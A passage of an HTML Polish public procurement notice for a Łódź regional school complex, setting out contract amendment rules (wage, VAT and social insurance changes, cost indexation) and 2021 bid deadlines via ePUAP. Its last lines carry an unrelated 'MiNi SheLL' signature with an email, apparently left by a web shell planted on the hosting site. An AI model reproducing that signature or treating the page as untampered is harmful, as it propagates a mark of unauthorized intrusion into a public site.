środki dowodowe,<br/>o których mowa w pkt. 11.4 SWZ przy czym podmiotowe środki dowodowe, o których mowa w<br/>pkt 11.4.2 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/wykazują<br/>spełnianie warunku, w zakresie i na zasadach opisanych w pkt 10.1 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	W związku z art. 436 ust. 4 lit. b) Ustawy PZP Strony dokonają w formie pisemnego aneksu zmian wysokości Wynagrodzenia należnego Wykonawcy w przypadku zmiany:<br/>1) stawki podatku od towarów i usług,<br/>2) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej ustalonych na podstawie przepisów Ustawy o minimalnym wynagrodzeniu za pracę,<br/>3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,<br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. 2020 poz. 1342), <br/>- jeżeli ww. zmiany będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. Zmiana wysokości Wynagrodzenia obowiązywać będzie od dnia wejścia w życie zmian, o których mowa w ust. 1.<br/>2.	W wypadku zmiany, o której mowa w ust. 1.1. wartość netto Wynagrodzenia nie zmieni się, a określona w aneksie wartość brutto Wynagrodzenia zostanie wyliczona na podstawie nowych przepisów.<br/>3.	Zmiana, o której mowa w ust. 1.2. oraz 1.3. zostanie dokonana w następujący sposób: <br/>1) w razie zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie przepisów Ustawy o minimalnym wynagrodzeniu za pracę, przez pojęcie „odpowiedniej zmiany wynagrodzenia” należy rozumieć sumę wzrostu kosztów wykonawcy zamówienia publicznego wynikających z podwyższenia wynagrodzeń poszczególnych pracowników biorących udział w realizacji pozostałej do wykonania, w momencie wejścia w życie zmiany, części zamówienia, do wysokości wynagrodzenia minimalnego albo wysokości minimalnej stawki godzinowej, obowiązujących po zmianie przepisów lub jej odpowiedniej części, w przypadku osób zatrudnionych w wymiarze niższym niż pełen etat,<br/>2) w razie zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, lub zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych przez pojęcie „odpowiedniej zmiany wynagrodzenia” należy rozumieć sumę wzrostu kosztów wykonawcy zamówienia publicznego oraz drugiej strony umowy o pracę lub innej umowy cywilnoprawnej łączącej wykonawcę zamówienia publicznego z osobą fizyczną nieprowadzącą działalności gospodarczej, wynikających z konieczności odprowadzenia dodatkowych składek od wynagrodzeń osób zatrudnionych na umowę o pracę lub na podstawie innej umowy cywilnoprawnej zawartej przez wykonawcę z osobą fizyczną nieprowadzącą działalności gospodarczej, a biorących udział w realizacji pozostałej do wykonania, w momencie wejścia w życie zmiany, części zamówienia przy założeniu braku zmiany wynagrodzenia netto tych osób.<br/>4.	W razie zmiany wysokości kosztów ponoszonych przez Wykonawcę na realizację Usługi o co najmniej 3% w stosunku do wartości kosztów przyjętych do obliczenia obowiązującej stawki Wynagrodzenia, Wykonawcy przysługuje uprawnienie do żądania zmiany wysokości stawki Wynagrodzenia za okazaniem Zamawiającemu zestawienia obrazującego zmianę ponoszonych kosztów w związku z realizacją nin. umowy. Zmiana wysokości kosztów ustalona zostanie w oparciu o wskaźniki zmian kosztów ogłaszane przez Prezesa Głównego Urzędu Statystycznego. Wysokość wynagrodzenia może być zmieniana w okresach 12 miesięcznych. Jako termin początkowy zmiany przyjmuje się okres 12 miesięcy liczonych od dnia zawarcia umowy. Stawka Wynagrodzenia nie może być na podstawie niniejszego punktu obniżona lub podwyższona o wartość większą niż 4000 PLN brutto w stosunku do pierwotnej ceny określonej w ofercie.<br/>5.	Wykonawca, którego wynagrodzenie zostało zmienione zgodnie z ust. 4zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zmianom wysokości kosztów dotyczących zobowiązania podwykonawcy, jeżeli łącznie spełnione są następujące warunki: przedmiotem umowy są usługi,a okres obow um >12 m-cy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-29 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP dostępnego pod adresem: https://epuap.gov.pl/wps/portal (Elektronicznej Skrzynki Podawczej – nazwa – ZESPÓŁ SZKÓŁ I PLACÓWEK OŚWIATOWYCH NOWOCZESNYCH TECHNOLOGII WOJEWÓDZTWA ŁÓDZKIEGO) i udostępnionego również na miniPortalu pod adresem https://miniportal.uzp.gov.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-29 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-27</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-21 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com